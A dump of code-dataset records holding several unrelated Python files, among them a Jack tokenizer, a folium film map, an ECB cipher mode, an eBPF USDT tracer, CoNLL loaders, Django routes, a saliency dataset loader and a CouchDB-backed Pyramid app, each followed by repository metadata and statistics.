    @staticmethod
    def split_line_by_symbols(line):
        """Split *line* into tokens on spaces and Jack symbols, keeping
        double-quoted string literals (with backslash-escaped quotes) intact."""
        result = list()
        idx = 0
        temp = ""
        while idx < len(line):
            if line[idx] == ' ':
                result.append(temp)
                temp = ""
            elif line[idx] in SYMBOLS and line[idx] != '\"':
                if len(temp):
                    result.append(temp)
                    result.append(line[idx])
                    temp = ""
                else:
                    result.append(line[idx])
            elif line[idx] == '\"':
                # Scan to the closing quote, skipping \" escapes.
                # NOTE(review): an unterminated string (find() == -1) is not
                # handled and would misbehave — assumed not to occur in
                # valid Jack source.
                next_idx = line.find('\"', idx + 1)
                while line[next_idx - 1] == '\\':
                    next_idx = line.find('\"', next_idx)
                segment = line[idx:next_idx + 1]
                result.append(segment)
                temp = ""
                idx = next_idx + 1
                continue
            else:
                temp += line[idx]
            idx += 1
        return result

    def tokenize(self):
        """Run the full pipeline: filter comments, split into tokens,
        classify each one and emit the XML token stream."""
        self.filter()
        for line in self._data:
            segments = self.split_line_by_symbols(line)
            for segment in segments:
                current_type = self.get_token_type(segment)
                if current_type is not None:
                    self._types.append(current_type)
                    self._tokens.append(segment)
                    if current_type not in {'stringConstant', 'integerConstant'}:
                        current_type = current_type.lower()
                    else:
                        if current_type == 'stringConstant':
                            current_type = 'stringConstant'
                            # Stored/emitted strings drop the surrounding quotes.
                            self._tokens[-1] = self._tokens[-1].strip('\"')
                            segment = segment.strip('\"')
                        else:
                            current_type = 'integerConstant'
                    if segment in {'<', '>', '\"', '&'}:
                        self._tokens[-1] = self.convert_lt_gt_quot_amp(segment)
                        segment = self.convert_lt_gt_quot_amp(segment)
                    self._xml.append('<' + current_type + '> ' + segment + ' </' + current_type + '>')
                elif len(segment.strip()):
                    print(segment)
                    raise Exception("Invalid Token")
        self._xml.append('</tokens>')
| 33.981707
| 102
| 0.466535
| 554
| 5,573
| 4.501805
| 0.176895
| 0.048516
| 0.038492
| 0.024058
| 0.074579
| 0.040096
| 0.040096
| 0
| 0
| 0
| 0
| 0.012689
| 0.406065
| 5,573
| 163
| 103
| 34.190184
| 0.740786
| 0
| 0
| 0.19863
| 0
| 0
| 0.054908
| 0.013099
| 0
| 0
| 0
| 0
| 0
| 1
| 0.089041
| false
| 0
| 0.013699
| 0.041096
| 0.232877
| 0.006849
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c98092ff02eaf3078402f8fe2053638da3880d53
| 1,115
|
py
|
Python
|
main.py
|
TimKozak/NearestFilms
|
991f8b7b1cb9f7f47c6bff818aaae3b91eb80375
|
[
"MIT"
] | 2
|
2021-02-15T20:38:03.000Z
|
2021-12-15T12:42:54.000Z
|
main.py
|
TimKozak/NearestFilms
|
991f8b7b1cb9f7f47c6bff818aaae3b91eb80375
|
[
"MIT"
] | null | null | null |
main.py
|
TimKozak/NearestFilms
|
991f8b7b1cb9f7f47c6bff818aaae3b91eb80375
|
[
"MIT"
] | null | null | null |
"""
Main module of a program.
"""
import folium
from tools import find_coords, user_input
def creating_map():
    """
    Creates HTML page for a given data.

    Reads the year and the user's coordinates, looks up nearby film
    locations and writes them as markers (plus connecting lines) to
    nearest_films.html.
    """
    year, coords = user_input()
    locations = find_coords(year, coords)
    mp = folium.Map(location=coords, zoom_start=10)
    # Red "home" marker at the user's own position.
    mp.add_child(folium.Marker(
        location=coords,
        popup="You are here",
        icon=folium.Icon(color='red',
                         icon_color='lightgray',
                         icon='home')))
    for location in locations:
        # Green marker per film location plus an orange line back to the user.
        mp.add_child(folium.Marker(
            location=[location[1][0], location[1][1]],
            popup=location[0],
            icon=folium.Icon(color='green',
                             icon_color='white',
                             icon='cloud')))
        folium.PolyLine(locations=[(coords[0], coords[1]),
                                   location[1]], color='orange').add_to(mp)
    mp.save('nearest_films.html')
    print("Map successfully generated")  # fixed typo: was "succesfully"
if __name__ == "__main__":
creating_map()
# print(find_coords(2017, (52.4081812, -1.510477)))
| 27.195122
| 75
| 0.552466
| 127
| 1,115
| 4.677165
| 0.488189
| 0.060606
| 0.050505
| 0.053872
| 0.10101
| 0.10101
| 0
| 0
| 0
| 0
| 0
| 0.039113
| 0.312108
| 1,115
| 40
| 76
| 27.875
| 0.735332
| 0.100448
| 0
| 0.08
| 0
| 0
| 0.102041
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.08
| 0
| 0.12
| 0.04
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c98373f93bfe070f74725f6b7462934da5ef570c
| 1,366
|
py
|
Python
|
ptCrypt/Symmetric/Modes/ECB.py
|
0awawa0/aCrypt
|
7c5d07271d524b9e5b03035d63587b69bff5abc7
|
[
"MIT"
] | null | null | null |
ptCrypt/Symmetric/Modes/ECB.py
|
0awawa0/aCrypt
|
7c5d07271d524b9e5b03035d63587b69bff5abc7
|
[
"MIT"
] | 25
|
2021-12-08T07:20:11.000Z
|
2021-12-10T12:07:05.000Z
|
ptCrypt/Symmetric/Modes/ECB.py
|
0awawa0/aCrypt
|
7c5d07271d524b9e5b03035d63587b69bff5abc7
|
[
"MIT"
] | null | null | null |
from ptCrypt.Symmetric.Modes.Mode import Mode
from ptCrypt.Symmetric.BlockCipher import BlockCipher
from ptCrypt.Symmetric.Paddings.Padding import Padding
class ECB(Mode):
    """Electronic codebook (ECB) mode of encryption — the simplest mode.

    Every block is transformed independently of all the others.
    More: https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB)
    """

    def __init__(self, cipher: BlockCipher, padding: Padding = None):
        super().__init__(cipher, padding)

    def encrypt(self, data: bytes):
        """Pad *data* (when a padding scheme is configured) and encrypt it
        block by block."""
        if self.padding:
            data = self.padding.pad(data)
        transformed = [self.cipher.encrypt(block) for block in self.splitBlocks(data)]
        return self.joinBlocks(transformed)

    def decrypt(self, data: bytes):
        """Decrypt *data* block by block, then strip padding if configured.

        Raises BlockCipher.WrongBlockSizeException when the input length is
        not a multiple of the cipher's block size.
        """
        if len(data) % self.cipher.blockSize:
            raise BlockCipher.WrongBlockSizeException(f"Cannot process data. Data size ({len(data)}) is not multiple of the cipher block size ({self.cipher.blockSize}).")
        decrypted = self.joinBlocks([self.cipher.decrypt(block) for block in self.splitBlocks(data)])
        if self.padding:
            decrypted = self.padding.unpad(decrypted)
        return decrypted
| 35.947368
| 170
| 0.666179
| 163
| 1,366
| 5.496933
| 0.380368
| 0.055804
| 0.066964
| 0.033482
| 0.138393
| 0.138393
| 0.138393
| 0.138393
| 0.138393
| 0.138393
| 0
| 0
| 0.233529
| 1,366
| 37
| 171
| 36.918919
| 0.855778
| 0.15959
| 0
| 0.26087
| 0
| 0.043478
| 0.099203
| 0.023029
| 0
| 0
| 0
| 0
| 0
| 1
| 0.130435
| false
| 0
| 0.130435
| 0
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c983d81c361719032d41d5bf9ca26fcce754a0f2
| 1,335
|
py
|
Python
|
src/static-vxlan-agent/test/arp_tracer.py
|
jbemmel/srl-evpn-proxy
|
240b8180ab03ee06a5043e646781860ba32a3530
|
[
"Apache-2.0"
] | 8
|
2021-08-25T01:08:09.000Z
|
2022-01-18T12:44:41.000Z
|
src/static-vxlan-agent/test/arp_tracer.py
|
jbemmel/srl-evpn-proxy
|
240b8180ab03ee06a5043e646781860ba32a3530
|
[
"Apache-2.0"
] | null | null | null |
src/static-vxlan-agent/test/arp_tracer.py
|
jbemmel/srl-evpn-proxy
|
240b8180ab03ee06a5043e646781860ba32a3530
|
[
"Apache-2.0"
] | 1
|
2022-03-13T22:36:18.000Z
|
2022-03-13T22:36:18.000Z
|
#!/usr/bin/env python3 # Originally python2
# Sample from https://www.collabora.com/news-and-blog/blog/2019/05/14/an-ebpf-overview-part-5-tracing-user-processes/
# Python program with embedded C eBPF program
from bcc import BPF, USDT
import sys
bpf = """
#include <uapi/linux/ptrace.h>
BPF_PERF_OUTPUT(events);
struct file_transf {
char client_ip_str[20];
char file_path[300];
u32 file_size;
u64 timestamp;
};
int trace_file_transfers(struct pt_regs *ctx, char *ipstrptr, char *pathptr, u32 file_size) {
struct file_transf ft = {0};
ft.file_size = file_size;
ft.timestamp = bpf_ktime_get_ns();
bpf_probe_read(&ft.client_ip_str, sizeof(ft.client_ip_str), (void *)ipstrptr);
bpf_probe_read(&ft.file_path, sizeof(ft.file_path), (void *)pathptr);
events.perf_submit(ctx, &ft, sizeof(ft));
return 0;
};
"""
def print_event(cpu, data, size):
    """Perf-buffer callback: decode one file_transf event and print it."""
    event = b["events"].event(data)
    message = "{0}: {1} is downloding file {2} ({3} bytes)".format(
        event.timestamp, event.client_ip_str, event.file_path, event.file_size)
    print(message)
# Attach the "file_transfer" USDT probe of the target process (PID from
# argv[1]) to the eBPF function above, then stream events until Ctrl-C.
u = USDT(pid=int(sys.argv[1]))
u.enable_probe(probe="file_transfer", fn_name="trace_file_transfers")
b = BPF(text=bpf, usdt_contexts=[u])
b["events"].open_perf_buffer(print_event)
while 1:
    try:
        b.perf_buffer_poll()
    except KeyboardInterrupt:
        exit()
| 31.046512
| 117
| 0.702622
| 209
| 1,335
| 4.277512
| 0.511962
| 0.044743
| 0.049217
| 0.03132
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026455
| 0.150562
| 1,335
| 42
| 118
| 31.785714
| 0.761905
| 0.151311
| 0
| 0.058824
| 0
| 0
| 0.59876
| 0.179805
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029412
| false
| 0
| 0.058824
| 0
| 0.117647
| 0.088235
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c98644a1740c0b9a2213d68e9dafb7bed9e7032f
| 3,500
|
py
|
Python
|
src/utils/loaders.py
|
OE-Heart/span-based-srl
|
a03b46a5ea4c59e14bea80ea724b0de276df4bc1
|
[
"MIT"
] | 41
|
2018-10-05T21:48:33.000Z
|
2022-02-16T10:24:39.000Z
|
src/utils/loaders.py
|
OE-Heart/span-based-srl
|
a03b46a5ea4c59e14bea80ea724b0de276df4bc1
|
[
"MIT"
] | 9
|
2018-10-21T14:45:01.000Z
|
2022-02-25T14:25:29.000Z
|
src/utils/loaders.py
|
OE-Heart/span-based-srl
|
a03b46a5ea4c59e14bea80ea724b0de276df4bc1
|
[
"MIT"
] | 9
|
2018-10-16T07:00:51.000Z
|
2022-02-17T13:10:47.000Z
|
import os
import gzip
import pickle
import h5py
import numpy as np
import theano
from utils.misc import get_file_names_in_dir
from utils.vocab import UNK
class Loader(object):
    """Base class for corpus/embedding loaders.

    Subclasses implement load(); the static helpers read pickled, plain-text
    key/value and HDF5 files, and the *_from_dir methods batch-load every
    matching file in a directory.
    """

    def __init__(self, argv):
        self.argv = argv

    def load(self, **kwargs):
        raise NotImplementedError

    @staticmethod
    def load_data(fn):
        """Unpickle an object from the gzip-compressed file *fn*."""
        with gzip.open(fn, 'rb') as gf:
            return pickle.load(gf)

    @staticmethod
    def load_key_value_format(fn):
        """Read whitespace-separated "key value" lines as (str, int) pairs."""
        pairs = []
        with open(fn, 'r') as f:
            for raw_line in f:
                key, value = raw_line.rstrip().split()
                pairs.append((key, int(value)))
        return pairs

    @staticmethod
    def load_hdf5(path):
        """Open an HDF5 file read-only."""
        return h5py.File(path, 'r')

    def load_txt_from_dir(self, dir_path, file_prefix):
        """Load every ``<file_prefix>*txt`` file found under *dir_path*."""
        matching = [fn for fn in get_file_names_in_dir(dir_path + '/*')
                    if os.path.basename(fn).startswith(file_prefix)
                    and fn.endswith('txt')]
        return [self.load(path=fn) for fn in matching]

    def load_hdf5_from_dir(self, dir_path, file_prefix):
        """Open every ``<file_prefix>*hdf5`` file found under *dir_path*."""
        matching = [fn for fn in get_file_names_in_dir(dir_path + '/*')
                    if os.path.basename(fn).startswith(file_prefix)
                    and fn.endswith('hdf5')]
        return [self.load_hdf5(fn) for fn in matching]
class Conll05Loader(Loader):
    """Loader for CoNLL-2005 column-format files.

    Sentences are separated by blank lines; each non-blank line is one
    token's columns. In test mode only the first 6 columns are kept.
    """

    def load(self, path, data_size=1000000, is_test=False):
        if path is None:
            return []
        corpus = []
        sent = []
        with open(path) as f:
            for line in f:
                columns = line.rstrip().split()
                if not columns:
                    # Blank line: sentence boundary.
                    corpus.append(sent)
                    sent = []
                    if len(corpus) >= data_size:
                        break
                else:
                    sent.append(columns[:6] if is_test else columns)
        return corpus
class Conll12Loader(Loader):
    """Loader for CoNLL-2012 column-format files.

    Token lines carry more than 10 columns (test mode keeps the first 11);
    blank lines end a sentence; any other line is ignored.
    """

    def load(self, path, data_size=1000000, is_test=False):
        if path is None:
            return []
        corpus = []
        sent = []
        with open(path) as f:
            for line in f:
                columns = line.rstrip().split()
                if len(columns) > 10:
                    sent.append(columns[:11] if is_test else columns)
                elif not columns:
                    # Blank line: sentence boundary.
                    corpus.append(sent)
                    sent = []
                    if len(corpus) >= data_size:
                        break
        return corpus
def load_emb(path):
    """Load a whitespace-separated word-embedding file.

    Each line is ``word v1 v2 ...``. When the UNK token is absent it is
    prepended, with the mean of all vectors as its embedding.
    Returns (word_list, embedding_matrix).
    """
    words = []
    vectors = []
    with open(path) as f:
        for line in f:
            fields = line.rstrip().split()
            words.append(fields[0])
            vectors.append(fields[1:])
    emb = np.asarray(vectors, dtype=theano.config.floatX)
    if UNK not in words:
        words = [UNK] + words
        # Mean vector stands in for the unknown word.
        emb = np.vstack((np.mean(emb, axis=0), emb))
    return words, emb
def load_pickle(fn):
    """Deserialize an object from the gzip-compressed pickle file *fn*."""
    gf = gzip.open(fn, 'rb')
    try:
        return pickle.load(gf)
    finally:
        gf.close()
def load_key_value_format(fn):
    """Read whitespace-separated "key value" lines from *fn* and return
    them as a list of (str, int) pairs, in file order."""
    with open(fn, 'r') as f:
        return [(key, int(value))
                for key, value in (line.rstrip().split() for line in f)]
| 26.315789
| 69
| 0.513714
| 440
| 3,500
| 3.938636
| 0.206818
| 0.057126
| 0.017311
| 0.028852
| 0.618581
| 0.608771
| 0.562608
| 0.562608
| 0.562608
| 0.548182
| 0
| 0.015741
| 0.382857
| 3,500
| 132
| 70
| 26.515152
| 0.786574
| 0
| 0
| 0.596154
| 0
| 0
| 0.005143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.115385
| false
| 0
| 0.076923
| 0.009615
| 0.336538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a309e90ac2f88ea56edc2aaeacb9b7f74fba3681
| 591
|
py
|
Python
|
system_test_progress_tracking/progress_tracking/urls.py
|
TobKed/system_test_progress_tracking
|
633792e7057289b6a23db30c6353241123eaa2e4
|
[
"MIT"
] | null | null | null |
system_test_progress_tracking/progress_tracking/urls.py
|
TobKed/system_test_progress_tracking
|
633792e7057289b6a23db30c6353241123eaa2e4
|
[
"MIT"
] | 3
|
2020-02-11T23:29:05.000Z
|
2021-06-10T21:03:42.000Z
|
system_test_progress_tracking/progress_tracking/urls.py
|
TobKed/system_test_progress_tracking
|
633792e7057289b6a23db30c6353241123eaa2e4
|
[
"MIT"
] | 2
|
2019-01-24T20:39:31.000Z
|
2019-01-29T07:42:27.000Z
|
from django.urls import path
from .views import (
    home,  # NOTE(review): imported but not routed below — confirm whether still needed
    MachineDetailView,
    MachineListView,
    DryRunDataDetailView,
    MachineLastDataView,
)

# URL routes for the progress-tracking app.
# NOTE(review): the empty pattern '' is registered twice; URL matching always
# resolves to the first entry, but both names ('home-view' and
# 'machine-list-view') remain usable with reverse()/{% url %}.
urlpatterns = [
    path('', MachineListView.as_view(), name='home-view'),
    path('', MachineListView.as_view(), name='machine-list-view'),
    path('machine/<int:pk>', MachineDetailView.as_view(), name='machine-detail-view'),
    path('machine/<int:pk>/last', MachineLastDataView.as_view(), name='machine-last-data-view'),
    path('machine/run_data/<int:pk>', DryRunDataDetailView.as_view(), name='dry-run-data-detail-view'),
]
| 32.833333
| 103
| 0.698816
| 68
| 591
| 5.985294
| 0.352941
| 0.07371
| 0.12285
| 0.125307
| 0.240786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126904
| 591
| 17
| 104
| 34.764706
| 0.78876
| 0
| 0
| 0
| 0
| 0
| 0.258883
| 0.155668
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a30a5b9c466fd79c98aae5b462aff3ba4ea72d40
| 480
|
py
|
Python
|
main.py
|
mrroot5/wall-builder
|
2f0414359080fecdba5312463dd05cd9c11da6c1
|
[
"MIT"
] | null | null | null |
main.py
|
mrroot5/wall-builder
|
2f0414359080fecdba5312463dd05cd9c11da6c1
|
[
"MIT"
] | null | null | null |
main.py
|
mrroot5/wall-builder
|
2f0414359080fecdba5312463dd05cd9c11da6c1
|
[
"MIT"
] | null | null | null |
"""
Python version 3.6.7
OS Linux Ubuntu 18.04.1 LTS
Created: 30/11/2018 17:12
Finished: 30/11/2018 19:
Author: Adrian Garrido Garcia
"""
import sys
from wall.builder import build_a_wall
if __name__ == '__main__':
try:
build_a_wall(sys.argv[1], sys.argv[2])
except IndexError:
rows = input("Please, give me the number of wall rows: ")
bricks = input("Please, give me the number of bricks for every wall row: ")
build_a_wall(rows, bricks)
| 25.263158
| 83
| 0.672917
| 79
| 480
| 3.911392
| 0.64557
| 0.058252
| 0.097087
| 0.110032
| 0.18123
| 0.18123
| 0.18123
| 0
| 0
| 0
| 0
| 0.085106
| 0.216667
| 480
| 18
| 84
| 26.666667
| 0.736702
| 0.26875
| 0
| 0
| 0
| 0
| 0.309038
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.222222
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a30c417b3a747422a1fa92c8a3a68fa2a0ddf883
| 2,770
|
py
|
Python
|
dataset.py
|
njoel-ethz/saliency-rl
|
61cf7acf10569b04c3a59528a4fc511c6e794895
|
[
"MIT"
] | null | null | null |
dataset.py
|
njoel-ethz/saliency-rl
|
61cf7acf10569b04c3a59528a4fc511c6e794895
|
[
"MIT"
] | null | null | null |
dataset.py
|
njoel-ethz/saliency-rl
|
61cf7acf10569b04c3a59528a4fc511c6e794895
|
[
"MIT"
] | null | null | null |
import os
import csv
import cv2
import numpy as np
import torch
from torch.utils.data import Dataset, DataLoader
def transform(snippet):
    """Stack a list of H x W x 3 frames and normalize to roughly [-1, 1].

    Each pixel value v is mapped to (2*v - 255) / 255.  The frames are
    concatenated along the channel axis and reshaped so the result has
    shape (3, num_frames, H, W).
    """
    stacked = np.concatenate(snippet, axis=-1)
    tensor = torch.from_numpy(stacked).permute(2, 0, 1).contiguous().float()
    # In-place normalization: (2*v - 255) / 255.
    tensor = tensor.mul_(2.).sub_(255).div(255)
    h, w = tensor.size(1), tensor.size(2)
    return tensor.view(-1, 3, h, w).permute(1, 0, 2, 3)
class DHF1KDataset(Dataset):
    """Video-saliency training dataset (DHF1K or Atari frames).

    Samples a random window of ``len_snippet`` consecutive frames from one
    video and returns it together with the saliency map of the window's
    last frame.
    """

    def __init__(self, path_data, len_snippet):
        # path_data: dataset root directory; len_snippet: frames per clip.
        self.path_data = path_data
        self.len_snippet = len_snippet
        if (path_data == 'DHF1K_dataset'):
            path_to_file = 'DHF1K_num_frame_train.csv'#'Atari_num_frame_train.csv', 'r'))]
        else:
            path_to_file = 'Atari_num_frame_train.csv'
        # CSV rows are (frame_count, video_name) pairs for each video.
        csv_reader = csv.reader(open(path_to_file, 'r'))
        list_of_tuples = list(map(tuple, csv_reader)) #list of (#samples, file_name)
        num_frame = []
        for (n_samples, name) in list_of_tuples:
            num_frame.append((int(n_samples), name))
        self.list_num_frame = num_frame

    def __len__(self):
        # One sample per video listed in the CSV.
        return len(self.list_num_frame)

    def __getitem__(self, idx):
        """Return (clip_tensor, saliency_map, (video_name, map_file_name)).

        The clip start index is drawn uniformly at random; with probability
        0.5 both the clip and its map are mirrored horizontally (one draw
        of ``v`` controls both, keeping them consistent).
        """
        file_name = self.list_num_frame[idx][1]
        #file_name = '%04d'%(idx+1)
        path_clip = os.path.join(self.path_data, 'video', file_name)
        path_annt = os.path.join(self.path_data, 'annotation', file_name, 'maps')
        start_idx = np.random.randint(1, self.list_num_frame[idx][0]-self.len_snippet+1) #(0, ..) to keep 1st frame
        v = np.random.random()
        clip = []
        for i in range(self.len_snippet):
            # Frames are 1-based on disk: indices start_idx+1 .. start_idx+len_snippet.
            img = cv2.imread(os.path.join(path_clip, '%06d.png'%(start_idx+i+1)))
            img = cv2.resize(img, (384, 224))
            img = img[...,::-1]  # cv2 loads BGR; reverse channels to RGB
            if v < 0.5:
                img = img[:, ::-1, ...]  # horizontal mirror
            clip.append(img)
        # Saliency map of the LAST frame of the clip (index start_idx+len_snippet),
        # loaded as grayscale (flag 0).
        annt = cv2.imread(os.path.join(path_annt, '%06d.png'%(start_idx+self.len_snippet)), 0)
        annt = cv2.resize(annt, (384, 224))
        if v < 0.5:
            annt = annt[:, ::-1]
        return transform(clip), torch.from_numpy(annt.copy()).contiguous().float(), (file_name, '%06d.png'%(start_idx+self.len_snippet))
class InfiniteDataLoader(DataLoader):
    """DataLoader that never raises StopIteration: when the underlying
    iterator is exhausted a fresh epoch is started transparently, so
    iteration cycles through the dataset forever.

    Adapted from gist.github.com/MFreidank/821cc87b012c53fade03b0c7aba13958.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Persistent iterator over the wrapped DataLoader.
        self.dataset_iterator = super().__iter__()

    def __iter__(self):
        # The loader itself is the (endless) iterator.
        return self

    def __next__(self):
        try:
            return next(self.dataset_iterator)
        except StopIteration:
            # Epoch finished: start a new pass and return its first batch.
            self.dataset_iterator = super().__iter__()
            return next(self.dataset_iterator)
| 37.432432
| 136
| 0.615884
| 374
| 2,770
| 4.278075
| 0.283422
| 0.05
| 0.04375
| 0.04
| 0.22625
| 0.09125
| 0.035
| 0
| 0
| 0
| 0
| 0.03901
| 0.241155
| 2,770
| 74
| 137
| 37.432432
| 0.722169
| 0.072202
| 0
| 0.1
| 0
| 0
| 0.041813
| 0.019539
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116667
| false
| 0
| 0.1
| 0.033333
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a30d6af902c1a8c64022ae0458cac17dd1fa6032
| 6,398
|
py
|
Python
|
openprocurement/chronograph/__init__.py
|
yshalenyk/openprocurement.chronograph
|
c15a6da519cea8a09b5d9a943752a49dd6f5131f
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/chronograph/__init__.py
|
yshalenyk/openprocurement.chronograph
|
c15a6da519cea8a09b5d9a943752a49dd6f5131f
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/chronograph/__init__.py
|
yshalenyk/openprocurement.chronograph
|
c15a6da519cea8a09b5d9a943752a49dd6f5131f
|
[
"Apache-2.0"
] | null | null | null |
import gevent.monkey
# Must run before the other imports below so stdlib networking becomes
# cooperative under gevent.
gevent.monkey.patch_all()
import os
from logging import getLogger
#from apscheduler.executors.pool import ThreadPoolExecutor, ProcessPoolExecutor
from apscheduler.schedulers.gevent import GeventScheduler as Scheduler
from couchdb import Server, Session
from couchdb.http import Unauthorized, extract_credentials
from datetime import datetime, timedelta
#from openprocurement.chronograph.jobstores import CouchDBJobStore
from openprocurement.chronograph.design import sync_design
from openprocurement.chronograph.scheduler import push
from openprocurement.chronograph.utils import add_logging_context
from pyramid.config import Configurator
from pytz import timezone
from pyramid.events import ApplicationCreated, ContextFound
from pbkdf2 import PBKDF2
LOGGER = getLogger(__name__)
TZ = timezone(os.environ['TZ'] if 'TZ' in os.environ else 'Europe/Kiev')
SECURITY = {u'admins': {u'names': [], u'roles': ['_admin']}, u'members': {u'names': [], u'roles': ['_admin']}}
VALIDATE_DOC_ID = '_design/_auth'
VALIDATE_DOC_UPDATE = """function(newDoc, oldDoc, userCtx){
if(newDoc._deleted) {
throw({forbidden: 'Not authorized to delete this document'});
}
if(userCtx.roles.indexOf('_admin') !== -1 && newDoc.indexOf('_design/') === 0) {
return;
}
if(userCtx.name === '%s') {
return;
} else {
throw({forbidden: 'Only authorized user may edit the database'});
}
}"""
def start_scheduler(event):
    """Pyramid ``ApplicationCreated`` subscriber: start the APScheduler
    instance stored on the application's registry.
    """
    event.app.registry.scheduler.start()
def main(global_config, **settings):
    """ This function returns a Pyramid WSGI application.

    Wires up routes, provisions the CouchDB database (including security
    objects and the validate_doc_update design document when an admin URL
    is configured) and attaches a gevent APScheduler to the registry.
    """
    config = Configurator(settings=settings)
    config.add_subscriber(add_logging_context, ContextFound)
    config.include('pyramid_exclog')
    # HTTP routes served by the chronograph.
    config.add_route('home', '/')
    config.add_route('resync_all', '/resync_all')
    config.add_route('resync_back', '/resync_back')
    config.add_route('resync', '/resync/{tender_id}')
    config.add_route('recheck', '/recheck/{tender_id}')
    config.add_route('calendar', '/calendar')
    config.add_route('calendar_entry', '/calendar/{date}')
    config.add_route('streams', '/streams')
    config.scan(ignore='openprocurement.chronograph.tests')
    # The scheduler is started only after the WSGI app is fully created.
    config.add_subscriber(start_scheduler, ApplicationCreated)
    config.registry.api_token = os.environ.get('API_TOKEN', settings.get('api.token'))
    db_name = os.environ.get('DB_NAME', settings['couchdb.db_name'])
    server = Server(settings.get('couchdb.url'), session=Session(retry_delays=range(60)))
    if 'couchdb.admin_url' not in settings and server.resource.credentials:
        # No separate admin URL: verify the credentials embedded in
        # couchdb.url actually work; otherwise retry without credentials.
        try:
            server.version()
        except Unauthorized:
            server = Server(extract_credentials(settings.get('couchdb.url'))[0], session=Session(retry_delays=range(60)))
    config.registry.couchdb_server = server
    if 'couchdb.admin_url' in settings and server.resource.credentials:
        # Admin connection available: provision security objects, the main
        # chronograph user, and the validate_doc_update design document.
        aserver = Server(settings.get('couchdb.admin_url'), session=Session(retry_delays=range(10)))
        users_db = aserver['_users']
        if SECURITY != users_db.security:
            LOGGER.info("Updating users db security", extra={'MESSAGE_ID': 'update_users_security'})
            users_db.security = SECURITY
        username, password = server.resource.credentials
        user_doc = users_db.get('org.couchdb.user:{}'.format(username), {'_id': 'org.couchdb.user:{}'.format(username)})
        # Re-save the user document only when its stored PBKDF2 hash does
        # not match the configured password.
        if not user_doc.get('derived_key', '') or PBKDF2(password, user_doc.get('salt', ''), user_doc.get('iterations', 10)).hexread(int(len(user_doc.get('derived_key', '')) / 2)) != user_doc.get('derived_key', ''):
            user_doc.update({
                "name": username,
                "roles": [],
                "type": "user",
                "password": password
            })
            LOGGER.info("Updating chronograph db main user", extra={'MESSAGE_ID': 'update_chronograph_main_user'})
            users_db.save(user_doc)
        security_users = [username, ]
        if db_name not in aserver:
            aserver.create(db_name)
        db = aserver[db_name]
        SECURITY[u'members'][u'names'] = security_users
        if SECURITY != db.security:
            LOGGER.info("Updating chronograph db security", extra={'MESSAGE_ID': 'update_chronograph_security'})
            db.security = SECURITY
        auth_doc = db.get(VALIDATE_DOC_ID, {'_id': VALIDATE_DOC_ID})
        if auth_doc.get('validate_doc_update') != VALIDATE_DOC_UPDATE % username:
            auth_doc['validate_doc_update'] = VALIDATE_DOC_UPDATE % username
            LOGGER.info("Updating chronograph db validate doc", extra={'MESSAGE_ID': 'update_chronograph_validate_doc'})
            db.save(auth_doc)
        # sync couchdb views
        sync_design(db)
        # Switch back to the non-admin connection for normal operation.
        db = server[db_name]
    else:
        if db_name not in server:
            server.create(db_name)
        db = server[db_name]
        # sync couchdb views
